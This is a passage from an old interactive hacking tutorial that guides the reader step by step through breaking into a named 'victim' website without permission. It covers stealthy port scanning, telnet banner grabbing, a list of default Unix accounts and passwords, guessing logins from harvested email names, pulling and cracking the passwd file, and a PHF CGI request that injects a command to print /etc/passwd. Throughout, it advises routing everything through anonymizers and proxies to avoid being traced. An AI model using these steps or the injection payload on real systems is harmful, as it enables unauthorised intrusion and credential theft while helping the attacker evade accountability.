</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE DEADLY PORT SCAN:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">5. Now, we're about to get rough on the site. Port Scan the site.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Port scanning checks for all open ports for an IP. It is extremely useful, however, it practially screams to the webmaster's of the victim site that they are in the middle of being hacked. The is basically no legitimate reason to port scan a site unless you are about to hack it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">There are no very good ways to hide a port scan, but there are a few semi-stealthy port scanners. Most are only for Linux / Unix systems. However, the Exploit Generator for Windows is one that claims to be stealthy. However, if you are trying to enter a very secure site, perhaps forget about port scanning for now, unless you are running Linux.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Though, port scan will tell you all the services a site is running. If port 21 is open, it means they have an FTP server. If port 23 is open, it means they have telnet.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, What next?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">TELNETTING:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">5. The aim of telnetting to the site is basically to try and find out the server type. While your browser is in stealth mode, use the Anonymous Telnet applet in the <u>Cyberarmy.Com <http: www.cyberarmy.com=""></http:></u> to open a Telnet window.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Telnet to the site to Port 23. Usually, if the address is “www.froggy.com.au ”, try telnetting to "froggy.com.au ". If this does not work, try to telnet to telnet.froggy.com.au or try telnetting to any of the sites listed as name servers in your previous Whois search. Once you have got access, note any information it gives you, such as server type.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>This worked - I got the server type!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>None of that worked...</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">TELNETTING:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Now change the telnet to port 21. This should send you straight in to the server's FTP port. If this works, try typing SYST to find out what server type it is.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>This worked - I got the server type!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>None of that worked...</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">TELNETTING:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Now, if you are lucky, try telnetting to port 80, the HTTP port. Note if this gives you any information.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>This worked - I got the server type!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>None of that worked...</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">RUNNING LAME PROGRAMS:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I've got the Info... Now I want access!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">HACKING THROUGH THE PASSWORD:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I Want Root!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, I already know this server will need exploits</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">EASY THINGS FIRST:<br />
<br />
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social <br />
engineering, just to find that we could have got in by using:<br />
<br />
$Login: root<br />
$Password: root<br />
<br />
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and <br />
sometimes these are not changed. So, we telnet to froggy.com.au .<br />
<br />
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show <br />
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.<br />
<br />
Then try the following accounts and passwords:<br />
<br />
ACCOUNT: PASSWORD<br />
(login) root: (password)root<br />
sys: sys / system / bin<br />
bin: sys / bin<br />
mountfsys: mountfsys<br />
adm: adm<br />
uucp: uucp<br />
nuucp: anon<br />
anon: anon<br />
user: user<br />
games: games<br />
install: install<br />
demo: demo<br />
umountfsys: umountfsys<br />
sync: sync<br />
admin: admin<br />
guest: guest<br />
daemon: daemon<br />
<br />
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power <br />
over what files/processes they own.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nup... Didn't think it would work</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Incredible... That Lame Trick Actually Worked!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">USING THE LOGIN NAMES:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP <br />
program to their server) as:<br />
<br />
$Login: Fred<br />
$Password: Fred<br />
<br />
Do this with all the names you have found - you might get lucky.<br />
<br />
Did this work?</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, they had some baddass security, didn't work</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Oh, Golly Gee... I got access to one of the accounts!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">GETTING THE PASSWD FILE:<br />
<br />
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Make it so, Number 1</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">ANCIENT CHINESE FTP METHOD:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au <br />
<br />
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au <br />
<br />
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au </span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I'm In</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, stupid thing won't let me in</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">ANCIENT CHINESE FTP METHOD:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and <br />
look at it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If it looks like this when you open it, you are in luck:<br />
<br />
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh<br />
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh<br />
kangaroo:3A62i9qr:1012:10:Hisaharu<br />
[etc.]<br />
<br />
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.<br />
<br />
Or, did it look more like this:<br />
<br />
root:*:0:1:Operator:/:/bin/csh<br />
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh<br />
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh<br />
<br />
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed <br />
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a <br />
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, It was all shadowed</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, couldn't find the passwd file in the first place</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Yes! I think I got some non-shadowed passwords</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">DECRYPTING PASSWD FILES:<br />
<br />
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Yes! I Got Me Some Decrypted Passwords!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, the Encryption was too Good</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Give me some reading about all the different password crackers, where to find them, etc. <http: htext4.shtml="" tute="" www.cyberarmy.com=""></http:></u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE OLD-STYLE PHF TECHNIQUE:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">In the Overlord Anonymizer, type:</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div style="border-color: -moz-use-text-color -moz-use-text-color black; border-style: none none double; border-width: medium medium 1.5pt; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Top of Form 4<o:p></o:p></span></div></div><div align="center" style="color: #eeeeee;"><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: medium none;"><tbody>
<tr> <td style="border: medium none; padding: 0cm; width: 72.5pt;" valign="top" width="97"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;">OVERLORD ANONYMIZER</span><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;"> </span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> <td style="border: medium none; padding: 0cm; width: 72.5pt;" valign="top" width="97"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> </tr>
</tbody></table></div><div style="border-color: black -moz-use-text-color -moz-use-text-color; border-style: double none none; border-width: 1.5pt medium medium; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Bottom of Form 4<o:p></o:p></span></div></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, they fixed that PHF Bug Problem</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Yes! I Got Me Some Encrypted Passwords!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
